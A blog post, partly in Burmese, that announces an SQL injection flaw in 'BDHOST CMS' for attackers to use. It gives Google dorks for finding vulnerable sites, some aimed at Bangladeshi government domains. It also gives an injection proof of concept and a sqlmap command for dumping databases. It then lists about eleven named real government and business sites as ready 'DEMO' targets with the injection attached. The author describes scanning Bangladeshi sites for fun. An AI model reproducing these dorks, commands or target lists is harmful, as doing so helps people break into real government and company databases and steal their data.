BDHOST CMS - SQL Injection Vulnerability

 

Google Dorks          :- "Developed by BDHOST"

                             "Developed by BDHOST" inurl:"php?id="

                             "Developed by BDHOST" +inurl:/.php?id=  

                            "Developed by BDHOST" inurl:"php?id=" site:gov.bd              

POC   :  http://127.0.0.1/index.php?id=[SQL]'        
 

ဒီနည္းေတြ ့တာ သိပ္မၾကာေသးဘူးဗ်။ BDHost CMS ဆုိ ေတာ့ ကြ်န္ေတာ္စိတ္၀င္စားသြားတယ္.. ဘာလုိ ့လဲ BD ဆုိတဲ ့နုိင္ငံကုိသိတဲ့အတုိင္းဘဲ.. ကြ်န္ေတာ္ပ်င္းေနရင္ bd site ေတြဘဲ scan တယ္.. 

ခု ဒီနည္းေလးေတြေတာ့ အၾကိဳက္ေပ့ါဗ်ာ... bd ဆုိဒ္ေတြ ၾကီးလုိလုိပါဘဲ.. Injector ေတြအၾကိဳက္ေပ့ါ

ဗ်ာ...

တစ္ခုေတာ့ သိသင့္တယ္ဗ်... Web Security Lvl ေတြက ျမင့္ပါတယ္.. Noob Injector  ေတြအတြက္ေတာ့ သိပ္အဆင္မေျပေလာက္ပါဘူး... Tool user ေတြအတြက္ ကေတာ့..

Havij ေလာက္နဲ ့ဆုိ အလုပ္မျဖစ္ေလာက္ဘူးဗ်.. Sql Map ေလာက္နဲ ့မွေတာ္ရာက်မယ္ ထင္တယ္...

....

SQLMap

++++++++++++++++++++++++++

python sqlmap.py --url "http://127.0.0.1/index.php?id=[SQL]" --dbs

++++++++++++++++++++++++++

စမ္းလုိက္ရအုံးဗ်ာ..

  DEMO :-   http://www.bdp.gov.bd/index.php?id=11%27

              http://www.ansarvdpbank.gov.bd/index.php?id=65%27

              http://fltc.gov.bd/index.php?id=54%27

              http://rgamc.gov.bd/index.php?id=184%27

              http://www.mahimatours.com/index.php?id=46%27

              http://www.fair-bond.com/index.php?id=102%27

              http://intragroupbd.com/index.php?id=58%27

              http://www.apartmentpropertiesbd.com/news.php?id=6%27

              http://www.themeengineersltd.com/index.php?id=42%27

              http://www.cdpl-bd.com/index3.php?id=136%27

              http://192.99.33.95/~distribu/index.php?id=90%27

Please Give Us Your 1 Minute In Sharing This Post!

SOCIALIZE IT →

Tweet

FOLLOW US →

SHARE IT →

Powered By: BloggerYard.Com